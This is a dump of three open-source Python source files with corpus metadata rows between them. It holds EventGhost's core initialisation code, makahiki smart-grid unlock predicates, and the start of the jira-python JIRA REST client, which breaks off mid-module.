eg.CORE_PLUGIN_GUIDS = (
"{9D499A2C-72B6-40B0-8C8C-995831B10BB4}", # "EventGhost"
"{A21F443B-221D-44E4-8596-E1ED7100E0A4}", # "System"
"{E974D074-B0A3-4D0C-BBD1-992475DDD69D}", # "Window"
"{6B1751BF-F94E-4260-AB7E-64C0693FD959}", # "Mouse"
)
eg.ID_TEST = wx.NewId()
eg.mainDir = eg.Cli.mainDir
eg.imagesDir = join(eg.mainDir, "images")
eg.languagesDir = join(eg.mainDir, "languages")
eg.sitePackagesDir = join(
eg.mainDir,
"lib%d%d" % sys.version_info[:2],
"site-packages"
)
eg.revision = 2000 # Deprecated
eg.startupArguments = eg.Cli.args
eg.debugLevel = 0
eg.systemEncoding = locale.getdefaultlocale()[1]
eg.document = None
eg.result = None
eg.plugins = eg.Bunch()
eg.globals = eg.Bunch()
eg.globals.eg = eg
eg.event = None
eg.eventTable = {}
eg.eventString = ""
eg.notificationHandlers = {}
eg.programCounter = None
eg.programReturnStack = []
eg.indent = 0
eg.pluginList = []
eg.mainThread = threading.currentThread()
eg.stopExecutionFlag = False
eg.lastFoundWindows = []
eg.currentItem = None
eg.actionGroup = eg.Bunch()
eg.actionGroup.items = []
eg.folderPath = eg.FolderPath()
def _CommandEvent():
"""Generate new (CmdEvent, Binder) tuple
e.g. MooCmdEvent, EVT_MOO = EgCommandEvent()
"""
evttype = wx.NewEventType()
class _Event(wx.PyCommandEvent):
def __init__(self, id, **kw):
wx.PyCommandEvent.__init__(self, evttype, id)
self.__dict__.update(kw)
if not hasattr(self, "value"):
self.value = None
def GetValue(self):
return self.value
def SetValue(self, value):
self.value = value
return _Event, wx.PyEventBinder(evttype, 1)
eg.CommandEvent = _CommandEvent
eg.ValueChangedEvent, eg.EVT_VALUE_CHANGED = eg.CommandEvent()
eg.pyCrustFrame = None
eg.dummyAsyncoreDispatcher = None
if eg.startupArguments.configDir is None:
eg.configDir = join(eg.folderPath.RoamingAppData, eg.APP_NAME)
else:
eg.configDir = eg.startupArguments.configDir
if not exists(eg.configDir):
try:
os.makedirs(eg.configDir)
except:
pass
if eg.startupArguments.isMain:
if exists(eg.configDir):
os.chdir(eg.configDir)
else:
os.chdir(eg.mainDir)
eg.localPluginDir = join(eg.folderPath.ProgramData, eg.APP_NAME, "plugins")
eg.corePluginDir = join(eg.mainDir, "plugins")
eg.pluginDirs = [eg.corePluginDir, eg.localPluginDir]
Init.InitPathsAndBuiltins()
from eg.WinApi.Dynamic import GetCurrentProcessId # NOQA
eg.processId = GetCurrentProcessId()
Init.InitPil()
class Exception(Exception):
def __unicode__(self):
try:
return "\n".join([unicode(arg) for arg in self.args])
except UnicodeDecodeError:
return "\n".join([str(arg).decode('mbcs') for arg in self.args])
class StopException(Exception):
pass
class HiddenAction:
pass
def Bind(notification, listener):
if notification not in eg.notificationHandlers:
notificationHandler = eg.NotificationHandler()
eg.notificationHandlers[notification] = notificationHandler
else:
notificationHandler = eg.notificationHandlers[notification]
notificationHandler.listeners.append(listener)
def CallWait(func, *args, **kwargs):
result = [None]
event = threading.Event()
def CallWaitWrapper():
try:
result[0] = func(*args, **kwargs)
finally:
event.set()
wx.CallAfter(CallWaitWrapper)
event.wait()
return result[0]
def DummyFunc(*dummyArgs, **dummyKwargs):
"""
Just a do-nothing-function, that accepts arbitrary arguments.
"""
pass
def Exit():
"""
Sometimes you want to quickly exit a PythonScript, because you don't
want to build deeply nested if-structures for example. eg.Exit() will
exit your PythonScript immediately.
(Note: This is actually a sys.exit() but will not exit EventGhost,
because the SystemExit exception is catched for a PythonScript.)
"""
sys.exit()
def HasActiveHandler(eventstring):
for eventHandler in eg.eventTable.get(eventstring, []):
obj = eventHandler
while obj:
if not obj.isEnabled:
break
obj = obj.parent
else:
return True
return False
def MessageBox(message, caption=eg.APP_NAME, style=wx.OK, parent=None):
if parent is None:
style |= wx.STAY_ON_TOP
dialog = eg.MessageDialog(parent, message, caption, style)
result = dialog.ShowModal()
dialog.Destroy()
return result
def Notify(notification, value=None):
if notification in eg.notificationHandlers:
for listener in eg.notificationHandlers[notification].listeners:
listener(value)
# pylint: disable-msg=W0613
def RegisterPlugin(
name = None,
description = None,
kind = "other",
author = "[unknown author]",
version = "[unknown version]",
icon = None,
canMultiLoad = False,
createMacrosOnAdd = False,
url = None,
help = None,
guid = None,
**kwargs
):
"""
Registers information about a plugin to EventGhost.
:param name: should be a short descriptive string with the name of the
plugin.
:param description: a short description of the plugin.
:param kind: gives a hint about the category the plugin belongs to. It
should be a string with a value out of ``"remote"`` (for remote
receiver plugins), ``"program"`` (for program control plugins),
``"external"`` (for plugins that control external hardware) or
``"other"`` (if none of the other categories match).
:param author: can be set to the name or a list of names of the
developer(s) of the plugin.
:param version: can be set to a version string.
:param icon: can be a base64 encoded image for the plugin. If
``icon == None``, an "icon.png" will be used if it exists
in the plugin folder.
:param canMultiLoad: set this to ``True``, if a configuration can have
more than one instance of this plugin.
:param createMacrosOnAdd: if set to ``True``, when adding the plugin,
EventGhost will ask the user, if he/she wants to add a folder with all
actions of this plugin to his/her configuration.
:param url: displays a clickable link in the plugin info dialog.
:param help: a longer description and/or additional information for the
plugin. Will be added to
'description'.
:param guid: will help EG to identify your plugin, so there are no name
clashes with other plugins that accidentally might have the same
name and will later ease the update of plugins.
:param \*\*kwargs: just to consume unknown parameters, to make the call
backward compatible.
"""
pass
# pylint: enable-msg=W0613
def RestartAsyncore():
"""
Informs the asyncore loop of a new socket to handle.
"""
oldDispatcher = eg.dummyAsyncoreDispatcher
dispatcher = asyncore.dispatcher()
dispatcher.create_socket(socket.AF_INET, socket.SOCK_STREAM)
eg.dummyAsyncoreDispatcher = dispatcher
if oldDispatcher:
oldDispatcher.close()
if oldDispatcher is None:
# create a global asyncore loop thread
threading.Thread(target=asyncore.loop, name="AsyncoreThread").start()
def RunProgram():
eg.stopExecutionFlag = False
del eg.programReturnStack[:]
while eg.programCounter is not None:
programCounter = eg.programCounter
item, idx = programCounter
item.Execute()
if eg.programCounter == programCounter:
# program counter has not changed. Ask the parent for the next
# item.
if isinstance(item.parent, eg.MacroItem):
eg.programCounter = item.parent.GetNextChild(idx)
else:
eg.programCounter = None
while eg.programCounter is None and eg.programReturnStack:
# we have no next item in this level. So look in the return
# stack if any return has to be executed
eg.indent -= 2
item, idx = eg.programReturnStack.pop()
eg.programCounter = item.parent.GetNextChild(idx)
eg.indent = 0
def StopMacro(ignoreReturn=False):
"""
Instructs EventGhost to stop executing the current macro after the
current action (thus the PythonScript or PythonCommand) has finished.
"""
eg.programCounter = None
if ignoreReturn:
del eg.programReturnStack[:]
def Unbind(notification, listener):
eg.notificationHandlers[notification].listeners.remove(listener)
def Wait(secs, raiseException=True):
while secs > 0.0:
if eg.stopExecutionFlag:
if raiseException:
raise eg.StopException("Execution interrupted by the user.")
else:
return False
if secs > 0.1:
time.sleep(0.1)
else:
time.sleep(secs)
secs -= 0.1
return True
# now assign all the functions above to `eg`
eg.Bind = Bind
eg.CallWait = CallWait
eg.DummyFunc = DummyFunc
eg.Exception = Exception
eg.Exit = Exit
eg.HasActiveHandler = HasActiveHandler
eg.HiddenAction = HiddenAction
eg.MessageBox = MessageBox
eg.Notify = Notify
eg.RegisterPlugin = RegisterPlugin
eg.RestartAsyncore = RestartAsyncore
eg.RunProgram = RunProgram
eg.StopException = StopException
eg.StopMacro = StopMacro
eg.Unbind = Unbind
eg.Wait = Wait
eg.messageReceiver = eg.MainMessageReceiver()
eg.app = eg.App()
# we can't import the Icons module earlier, because wx.App must exist
import Icons # NOQA
eg.Icons = Icons
eg.log = eg.Log()
eg.Print = eg.log.Print
eg.PrintError = eg.log.PrintError
eg.PrintNotice = eg.log.PrintNotice
eg.PrintTraceback = eg.log.PrintTraceback
eg.PrintDebugNotice = eg.log.PrintDebugNotice
eg.PrintStack = eg.log.PrintStack
def TracebackHook(tType, tValue, traceback):
eg.log.PrintTraceback(excInfo=(tType, tValue, traceback))
sys.excepthook = TracebackHook
eg.colour = eg.Colour()
eg.config = eg.Config()
eg.debugLevel = int(eg.config.logDebug)
if eg.startupArguments.isMain and not eg.startupArguments.translate:
eg.text = eg.Text(eg.config.language)
else:
eg.text = eg.Text('en_EN')
eg.actionThread = eg.ActionThread()
eg.eventThread = eg.EventThread()
eg.pluginManager = eg.PluginManager()
eg.scheduler = eg.Scheduler()
eg.TriggerEvent = eg.eventThread.TriggerEvent
eg.TriggerEnduringEvent = eg.eventThread.TriggerEnduringEvent
from eg.WinApi.SendKeys import SendKeysParser # NOQA
eg.SendKeys = SendKeysParser()
setattr(eg, "PluginClass", eg.PluginBase)
setattr(eg, "ActionClass", eg.ActionBase)
eg.taskBarIcon = eg.TaskBarIcon(
eg.startupArguments.isMain and
eg.config.showTrayIcon and
not eg.startupArguments.translate and
not eg.startupArguments.install and
not eg.startupArguments.pluginFile
)
eg.SetProcessingState = eg.taskBarIcon.SetProcessingState
eg.Init = Init
eg.Init.Init()
| gpl-2.0 | 5,448,933,114,497,041,000 | 29.939698 | 78 | 0.687835 | false |
jtakayama/makahiki-draft | makahiki/apps/managers/predicate_mgr/smartgrid_tester_predicates.py | 1 | 10692 | """Predicates indicating if a level or cell should be unlocked."""
from django.db.models.query_utils import Q
from apps.widgets.smartgrid_play_tester import play_tester
from apps.widgets.smartgrid_design.models import DesignerAction, DesignerGrid
from apps.managers.smartgrid_mgr import smartgrid_mgr
def approved_action(user, draft_slug, action_slug):
"""Returns true if the action is approved."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft, action__slug=action_slug,
approval_status="approved").count() > 0
def approved_all_of_level(user, draft_slug, level_priority):
"""Returns True if the user has had all Actions on the given level approved."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
c = 0
count = len(DesignerGrid.objects.filter(draft=draft, level__priority=level_priority))
for action in DesignerGrid.objects.filter(level__priority=level_priority):
c += user.testeractionsubmittion_set.filter(action=action,
approval_status="approved").count()
return c >= count
def approved_all_of_resource(user, draft_slug, resource):
"""Returns True if the user has had all Actions of the given resource approved."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
count = DesignerAction.objects.filter(draft=draft, related_resource=resource).count()
return user.testeractionsubmittion_set.filter(draft=draft, action__related_resource=resource,
approval_status="approved").count() == count
def approved_all_of_type(user, draft_slug, action_type):
"""Returns True if the user has had all Actions of the action_type approved."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
count = DesignerAction.objects.filter(draft=draft, type=action_type).count()
return user.testeractionsubmittion_set.filter(action__type=action_type,
approval_status="approved").count() == count
def approved_some(user, draft_slug, count=1):
"""Returns True if the user has had count Actions approved."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft,
approval_status='approved').count() >= count
def approved_some_of_level(user, draft_slug, level_priority, count=1):
"""Returns True if the user has had count Actions approved for the given level."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
c = 0
for action in DesignerGrid.objects.filter(draft=draft, level__priority=level_priority):
c += user.testeractionsubmittion_set.filter(action=action,
approval_status="approved").count()
return c >= count
def approved_some_of_resource(user, draft_slug, resource, count=1):
"""Returns true of the user has had count Actions approved with the given resource."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft, action__related_resource=resource,
approval_status="approved").count() >= count
def approved_some_of_type(user, draft_slug, action_type, count=1):
"""Returns true if the user has had count Actions approved with the given action_type."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft, action__type=action_type,
approval_status="approved").count() >= count
def approved_some_full_spectrum(user, draft_slug, count=1):
"""Returns true if the user has had count Activities, Commitments, and Events approved."""
ret = approved_some_of_type(user, draft_slug, action_type='activity', count=count)
ret = ret and approved_some_of_type(user, draft_slug, action_type='commitment', count=count)
ret = ret and approved_some_of_type(user, draft_slug, action_type='event', count=count)
return ret
def completed_level(user, draft_slug, level_priority):
"""Returns true if the user has had all Activities and Commiments on the give level
approved."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
count = len(DesignerGrid.objects.filter(draft=draft,
level__priority=level_priority,
action__type='activity'))
count += len(DesignerGrid.objects.filter(draft=draft,
level__priority=level_priority,
action__type='commitment'))
c = 0
for grid in DesignerGrid.objects.filter(draft=draft,
level__priority=level_priority):
c += user.testeractionsubmittion_set.filter(draft=draft, action=grid.action,
approval_status="approved").count()
c += user.testeractionsubmittion_set.filter(draft=draft, action=grid.action,
action__type="commitment",
approval_status="pending").count()
return c >= count
def social_bonus_count(user, draft_slug, count):
"""Returns True if the number of social bonus the user received equals to count."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft,
social_bonus_awarded=True).count() >= count
def submitted_action(user, draft_slug, action_slug):
"""Returns true if the user complete the action."""
return action_slug in play_tester.get_submitted_actions(user, draft_slug)
def submitted_all_of_level(user, draft_slug, level_priority):
"""Returns True if the user has submitted all Actions on the given level."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
c = 0
count = len(DesignerGrid.objects.filter(draft=draft, level__priority=level_priority))
for action in DesignerGrid.objects.filter(draft=draft, level__priority=level_priority):
c += user.testeractionsubmittion_set.filter(draft=draft, action=action).count()
return c >= count
def submitted_all_of_resource(user, draft_slug, resource):
"""Returns true if user has submitted all Actions of the given resoruce."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
count = DesignerAction.objects.filter(draft=draft, related_resource=resource).count()
c = user.testeractionsubmittion_set.filter(draft=draft,
action__related_resource=resource).count()
return c == count
def submitted_all_of_type(user, draft_slug, action_type):
"""Returns true if user has submitted all Actions of the given action_type."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
count = DesignerAction.objects.filter(draft=draft, type=action_type).count()
return user.testeractionsubmittion_set.filter(draft=draft,
action__type=action_type).count() == count
def submitted_some(user, draft_slug, count=1):
"""Returns true if the user has completed count Actions."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft).count() >= count
def submitted_some_of_level(user, draft_slug, level_priority, count=1):
"""Returns true if the user has completed count Actions of the specified level."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
c = 0
for action in DesignerGrid.objects.filter(draft=draft, level__priority=level_priority):
c += user.testeractionsubmittion_set.filter(action=action).count()
return c >= count
def submitted_some_of_resource(user, draft_slug, resource, count=1):
"""Returns True if user has submitted count Actions with the given resource."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft,
action__related_resource=resource).count() >= \
count
def submitted_some_of_type(user, draft_slug, action_type, count=1):
"""Returns True if user has submitted count Actions with the given action_type."""
draft = smartgrid_mgr.get_designer_draft(draft_slug)
return user.testeractionsubmittion_set.filter(draft=draft,
action__type=action_type).count() >= count
def submitted_some_full_spectrum(user, draft_slug, count=1):
"""Returns true if the user has completed some activities, commitments, and
events."""
ret = submitted_some_of_type(user, draft_slug, action_type='activity', count=count)
ret = ret and submitted_some_of_type(user, draft_slug, action_type='commitment', count=count)
ret = ret and submitted_some_of_type(user, draft_slug, action_type='event', count=count)
return ret
def submitted_level(user, draft_slug, level_priority):
"""Returns true if the user has performed all activities successfully, and
attempted all commitments."""
_ = user
draft = smartgrid_mgr.get_designer_draft(draft_slug)
num_completed = 0
level_actions = DesignerGrid.objects.filter(
Q(action__type='activity') | Q(action__type='commitment'),
draft=draft, level__priority=level_priority)
for grid in level_actions:
testeractionsubmittion = user.testeractionsubmittion_set.filter(draft=draft,
action=grid.action)
if testeractionsubmittion:
num_completed += 1
num_level = level_actions.count()
# check if there is any activity or commitment
if not num_level:
return False
return num_completed == num_level
def unlock_on_date(user, draft_slug, date_string):
"""Returns True."""
_ = user
_ = draft_slug
_ = date_string
return True
def unlock_on_event(user, draft_slug, event_slug, days=0, lock_after_days=0):
"""Returns true if the current date is equal to or after the date of the Event
defined by the event_slug, optionally days before. days should be a negative number.
Optionally lock_after_days, if not zero then will return false lock_after_days
after the event."""
_ = user
_ = draft_slug
_ = event_slug
_ = days
_ = lock_after_days
return True
| mit | -3,509,848,243,233,196,000 | 47.162162 | 97 | 0.65535 | false |
milo-minderbinder/jira | jira/client.py | 1 | 110052 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import print_function
"""
This module implements a friendly (well, friendlier) interface between the raw JSON
responses from JIRA and the Resource/dict abstractions provided by this library. Users
will construct a JIRA object as described below. Full API documentation can be found
at: https://jira-python.readthedocs.org/en/latest/
"""
from functools import wraps
import imghdr
import mimetypes
import copy
import os
import re
import string
import tempfile
import logging
import json
import warnings
import pprint
import sys
import datetime
import calendar
import hashlib
from six.moves.urllib.parse import urlparse, urlencode
from requests.utils import get_netrc_auth
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from six import string_types, integer_types
# six.moves does not play well with pyinstaller, see https://github.com/pycontribs/jira/issues/38
# from six.moves import html_parser
if sys.version_info < (3, 0, 0):
import HTMLParser as html_parser
else:
import html.parser as html_parser
import requests
try:
from requests_toolbelt import MultipartEncoder
except:
pass
try:
from requests_jwt import JWTAuth
except ImportError:
pass
# JIRA specific resources
from .resources import Resource, Issue, Comment, Project, Attachment, Component, Dashboard, Filter, Votes, Watchers, \
Worklog, IssueLink, IssueLinkType, IssueType, Priority, Version, Role, Resolution, SecurityLevel, Status, User, \
CustomFieldOption, RemoteLink
# GreenHopper specific resources
from .resources import Board, Sprint
from .resilientsession import ResilientSession
from .version import __version__
from .utils import threaded_requests, json_loads, CaseInsensitiveDict
from .exceptions import JIRAError
try:
from random import SystemRandom
random = SystemRandom()
except ImportError:
import random
# warnings.simplefilter('default')
# encoding = sys.getdefaultencoding()
# if encoding != 'UTF8':
# warnings.warn("Python default encoding is '%s' instead of 'UTF8' which means that there is a big change of having problems. Possible workaround http://stackoverflow.com/a/17628350/99834" % encoding)
def translate_resource_args(func):
"""
Decorator that converts Issue and Project resources to their keys when used as arguments.
"""
@wraps(func)
def wrapper(*args, **kwargs):
arg_list = []
for arg in args:
if isinstance(arg, (Issue, Project)):
arg_list.append(arg.key)
else:
arg_list.append(arg)
result = func(*arg_list, **kwargs)
return result
return wrapper
class ResultList(list):
def __init__(self, iterable=None, _total=None):
if iterable is not None:
list.__init__(self, iterable)
else:
list.__init__(self)
self.total = _total if _total is not None else len(self)
class QshGenerator:
def __init__(self, context_path):
self.context_path = context_path
def __call__(self, req):
parse_result = urlparse(req.url)
path = parse_result.path[len(self.context_path):] if len(self.context_path) > 1 else parse_result.path
query = '&'.join(sorted(parse_result.query.split("&")))
qsh = '%(method)s&%(path)s&%(query)s' % {'method': req.method.upper(), 'path': path, 'query': query}
return hashlib.sha256(qsh).hexdigest()
class JIRA(object):
"""
User interface to JIRA.
Clients interact with JIRA by constructing an instance of this object and calling its methods. For addressable
resources in JIRA -- those with "self" links -- an appropriate subclass of :py:class:`Resource` will be returned
with customized ``update()`` and ``delete()`` methods, along with attribute access to fields. This means that calls
of the form ``issue.fields.summary`` will be resolved into the proper lookups to return the JSON value at that
mapping. Methods that do not return resources will return a dict constructed from the JSON response or a scalar
value; see each method's documentation for details on what that method returns.
"""
DEFAULT_OPTIONS = {
"server": "http://localhost:2990/jira",
"context_path": "/",
"rest_path": "api",
"rest_api_version": "2",
"verify": True,
"resilient": True,
"async": False,
"client_cert": None,
"check_update": True,
"headers": {
'X-Atlassian-Token': 'no-check',
'Cache-Control': 'no-cache',
# 'Accept': 'application/json;charset=UTF-8', # default for REST
'Content-Type': 'application/json', # ;charset=UTF-8',
# 'Accept': 'application/json', # default for REST
#'Pragma': 'no-cache',
#'Expires': 'Thu, 01 Jan 1970 00:00:00 GMT'
}
}
checked_version = False
JIRA_BASE_URL = '{server}/rest/api/{rest_api_version}/{path}'
AGILE_BASE_URL = '{server}/rest/greenhopper/1.0/{path}'
def __init__(self, server=None, options=None, basic_auth=None, oauth=None, jwt=None,
validate=False, get_server_info=True, async=False, logging=True, max_retries=3):
"""
Construct a JIRA client instance.
Without any arguments, this client will connect anonymously to the JIRA instance
started by the Atlassian Plugin SDK from one of the 'atlas-run', ``atlas-debug``,
or ``atlas-run-standalone`` commands. By default, this instance runs at
``http://localhost:2990/jira``. The ``options`` argument can be used to set the JIRA instance to use.
Authentication is handled with the ``basic_auth`` argument. If authentication is supplied (and is
accepted by JIRA), the client will remember it for subsequent requests.
For quick command line access to a server, see the ``jirashell`` script included with this distribution.
The easiest way to instantiate is using j = JIRA("https://jira.atlasian.com")
:param options: Specify the server and properties this client will use. Use a dict with any
of the following properties:
* server -- the server address and context path to use. Defaults to ``http://localhost:2990/jira``.
* rest_path -- the root REST path to use. Defaults to ``api``, where the JIRA REST resources live.
* rest_api_version -- the version of the REST resources under rest_path to use. Defaults to ``2``.
* verify -- Verify SSL certs. Defaults to ``True``.
* client_cert -- a tuple of (cert,key) for the requests library for client side SSL
:param basic_auth: A tuple of username and password to use when establishing a session via HTTP BASIC
authentication.
:param oauth: A dict of properties for OAuth authentication. The following properties are required:
* access_token -- OAuth access token for the user
* access_token_secret -- OAuth access token secret to sign with the key
* consumer_key -- key of the OAuth application link defined in JIRA
* key_cert -- private key file to sign requests with (should be the pair of the public key supplied to
JIRA in the OAuth application link)
:param jwt: A dict of properties for JWT authentication supported by Atlassian Connect. The following
properties are required:
* secret -- shared secret as delivered during 'installed' lifecycle event
(see https://developer.atlassian.com/static/connect/docs/latest/modules/lifecycle.html for details)
* payload -- dict of fields to be inserted in the JWT payload, e.g. 'iss'
Example jwt structure: ``{'secret': SHARED_SECRET, 'payload': {'iss': PLUGIN_KEY}}``
:param validate: If true it will validate your credentials first. Remember that if you are accesing JIRA
as anononymous it will fail to instanciate.
:param get_server_info: If true it will fetch server version info first to determine if some API calls
are available.
:param async: To enable async requests for those actions where we implemented it, like issue update() or delete().
Obviously this means that you cannot rely on the return code when this is enabled.
"""
if options is None:
options = {}
if server and hasattr(server, 'keys'):
warnings.warn(
"Old API usage, use JIRA(url) or JIRA(options={'server': url}, when using dictionary always use named parameters.",
DeprecationWarning)
options = server
server = None
if server:
options['server'] = server
if async:
options['async'] = async
self.logging = logging
self._options = copy.copy(JIRA.DEFAULT_OPTIONS)
self._options.update(options)
self._rank = None
# Rip off trailing slash since all urls depend on that
if self._options['server'].endswith('/'):
self._options['server'] = self._options['server'][:-1]
context_path = urlparse(self._options['server']).path
if len(context_path) > 0:
self._options['context_path'] = context_path
self._try_magic()
if oauth:
self._create_oauth_session(oauth)
elif basic_auth:
self._create_http_basic_session(*basic_auth)
self._session.headers.update(self._options['headers'])
elif jwt:
self._create_jwt_session(jwt)
else:
verify = self._options['verify']
self._session = ResilientSession()
self._session.verify = verify
self._session.headers.update(self._options['headers'])
self._session.max_retries = max_retries
if validate:
# This will raise an Exception if you are not allowed to login.
# It's better to fail faster than later.
self.session()
if get_server_info:
# We need version in order to know what API calls are available or not
si = self.server_info()
try:
self._version = tuple(si['versionNumbers'])
except Exception as e:
globals()['logging'].error("invalid server_info: %s", si)
raise e
else:
self._version = (0, 0, 0)
if self._options['check_update'] and not JIRA.checked_version:
self._check_update_()
JIRA.checked_version = True
# TODO: check if this works with non-admin accounts
self._fields = {}
for f in self.fields():
if 'clauseNames' in f:
for name in f['clauseNames']:
self._fields[name] = f['id']
def _check_update_(self):
# check if the current version of the library is outdated
try:
data = requests.get("http://pypi.python.org/pypi/jira/json", timeout=2.001).json()
released_version = data['info']['version']
if released_version > __version__:
warnings.warn("You are running an outdated version of JIRA Python %s. Current version is %s. Do not file any bugs against older versions." % (
__version__, released_version))
except requests.RequestException:
pass
except Exception as e:
logging.warning(e)
def __del__(self):
session = getattr(self, "_session", None)
if session is not None:
if sys.version_info < (3, 4, 0): # workaround for https://github.com/kennethreitz/requests/issues/2303
session.close()
def _check_for_html_error(self, content):
# TODO: Make it return errors when content is a webpage with errors
# JIRA has the bad habbit of returning errors in pages with 200 and
# embedding the error in a huge webpage.
if '<!-- SecurityTokenMissing -->' in content:
logging.warning("Got SecurityTokenMissing")
raise JIRAError("SecurityTokenMissing: %s" % content)
return False
return True
# Information about this client
def client_info(self):
"""Get the server this client is connected to."""
return self._options['server']
# Universal resource loading
def find(self, resource_format, ids=None):
"""
Get a Resource object for any addressable resource on the server.
This method is a universal resource locator for any RESTful resource in JIRA. The
argument ``resource_format`` is a string of the form ``resource``, ``resource/{0}``,
``resource/{0}/sub``, ``resource/{0}/sub/{1}``, etc. The format placeholders will be
populated from the ``ids`` argument if present. The existing authentication session
will be used.
The return value is an untyped Resource object, which will not support specialized
:py:meth:`.Resource.update` or :py:meth:`.Resource.delete` behavior. Moreover, it will
not know to return an issue Resource if the client uses the resource issue path. For this
reason, it is intended to support resources that are not included in the standard
Atlassian REST API.
:param resource_format: the subpath to the resource string
:param ids: values to substitute in the ``resource_format`` string
:type ids: tuple or None
"""
resource = Resource(resource_format, self._options, self._session)
resource.find(ids)
return resource
def async_do(self, size=10):
"""
This will execute all async jobs and wait for them to finish. By default it will run on 10 threads.
size: number of threads to run on.
:return:
"""
if hasattr(self._session, '_async_jobs'):
logging.info("Executing async %s jobs found in queue by using %s threads..." % (
len(self._session._async_jobs), size))
threaded_requests.map(self._session._async_jobs, size=size)
# Application properties
# non-resource
def application_properties(self, key=None):
"""
Return the mutable server application properties.
:param key: the single property to return a value for
"""
params = {}
if key is not None:
params['key'] = key
return self._get_json('application-properties', params=params)
def set_application_property(self, key, value):
"""
Set the application property.
:param key: key of the property to set
:param value: value to assign to the property
"""
url = self._options['server'] + \
'/rest/api/2/application-properties/' + key
payload = {
'id': key,
'value': value
}
r = self._session.put(
url, data=json.dumps(payload))
def applicationlinks(self, cached=True):
"""
List of application links
:return: json
"""
# if cached, return the last result
if cached and hasattr(self, '_applicationlinks'):
return self._applicationlinks
# url = self._options['server'] + '/rest/applinks/latest/applicationlink'
url = self._options['server'] + \
'/rest/applinks/latest/listApplicationlinks'
r = self._session.get(url)
o = json_loads(r)
if 'list' in o:
self._applicationlinks = o['list']
else:
self._applicationlinks = []
return self._applicationlinks
# Attachments
def attachment(self, id):
"""Get an attachment Resource from the server for the specified ID."""
return self._find_for_resource(Attachment, id)
# non-resource
def attachment_meta(self):
"""Get the attachment metadata."""
return self._get_json('attachment/meta')
@translate_resource_args
def add_attachment(self, issue, attachment, filename=None):
"""
Attach an attachment to an issue and returns a Resource for it.
The client will *not* attempt to open or validate the attachment; it expects a file-like object to be ready
for its use. The user is still responsible for tidying up (e.g., closing the file, killing the socket, etc.)
:param issue: the issue to attach the attachment to
:param attachment: file-like object to attach to the issue, also works if it is a string with the filename.
:param filename: optional name for the attached file. If omitted, the file object's ``name`` attribute
is used. If you aquired the file-like object by any other method than ``open()``, make sure
that a name is specified in one way or the other.
:rtype: an Attachment Resource
"""
if isinstance(attachment, string_types):
attachment = open(attachment, "rb")
if hasattr(attachment, 'read') and hasattr(attachment, 'mode') and attachment.mode != 'rb':
logging.warning(
"%s was not opened in 'rb' mode, attaching file may fail." % attachment.name)
# TODO: Support attaching multiple files at once?
url = self._get_url('issue/' + str(issue) + '/attachments')
fname = filename
if not fname:
fname = os.path.basename(attachment.name)
if 'MultipartEncoder' not in globals():
method = 'old'
r = self._session.post(
url,
files={
'file': (fname, attachment, 'application/octet-stream')},
headers=CaseInsensitiveDict({'content-type': None, 'X-Atlassian-Token': 'nocheck'}))
else:
method = 'MultipartEncoder'
def file_stream():
return MultipartEncoder(
fields={
'file': (fname, attachment, 'application/octet-stream')}
)
m = file_stream()
r = self._session.post(
url, data=m, headers=CaseInsensitiveDict({'content-type': m.content_type, 'X-Atlassian-Token': 'nocheck'}), retry_data=file_stream)
attachment = Attachment(self._options, self._session, json_loads(r)[0])
if attachment.size == 0:
raise JIRAError("Added empty attachment via %s method?!: r: %s\nattachment: %s" % (method, r, attachment))
return attachment
# Components
def component(self, id):
"""
Get a component Resource from the server.
:param id: ID of the component to get
"""
return self._find_for_resource(Component, id)
@translate_resource_args
def create_component(self, name, project, description=None, leadUserName=None, assigneeType=None,
isAssigneeTypeValid=False):
"""
Create a component inside a project and return a Resource for it.
:param name: name of the component
:param project: key of the project to create the component in
:param description: a description of the component
:param leadUserName: the username of the user responsible for this component
:param assigneeType: see the ComponentBean.AssigneeType class for valid values
:param isAssigneeTypeValid: boolean specifying whether the assignee type is acceptable
"""
data = {
'name': name,
'project': project,
'isAssigneeTypeValid': isAssigneeTypeValid
}
if description is not None:
data['description'] = description
if leadUserName is not None:
data['leadUserName'] = leadUserName
if assigneeType is not None:
data['assigneeType'] = assigneeType
url = self._get_url('component')
r = self._session.post(
url, data=json.dumps(data))
component = Component(self._options, self._session, raw=json_loads(r))
return component
def component_count_related_issues(self, id):
"""
Get the count of related issues for a component.
:type id: integer
:param id: ID of the component to use
"""
return self._get_json('component/' + id + '/relatedIssueCounts')['issueCount']
# Custom field options
def custom_field_option(self, id):
"""
Get a custom field option Resource from the server.
:param id: ID of the custom field to use
"""
return self._find_for_resource(CustomFieldOption, id)
# Dashboards
def dashboards(self, filter=None, startAt=0, maxResults=20):
"""
Return a ResultList of Dashboard resources and a ``total`` count.
:param filter: either "favourite" or "my", the type of dashboards to return
:param startAt: index of the first dashboard to return
:param maxResults: maximum number of dashboards to return. The total number of
results is always available in the ``total`` attribute of the returned ResultList.
"""
params = {}
if filter is not None:
params['filter'] = filter
params['startAt'] = startAt
params['maxResults'] = maxResults
r_json = self._get_json('dashboard', params=params)
dashboards = [Dashboard(self._options, self._session, raw_dash_json)
for raw_dash_json in r_json['dashboards']]
return ResultList(dashboards, r_json['total'])
def dashboard(self, id):
"""
Get a dashboard Resource from the server.
:param id: ID of the dashboard to get.
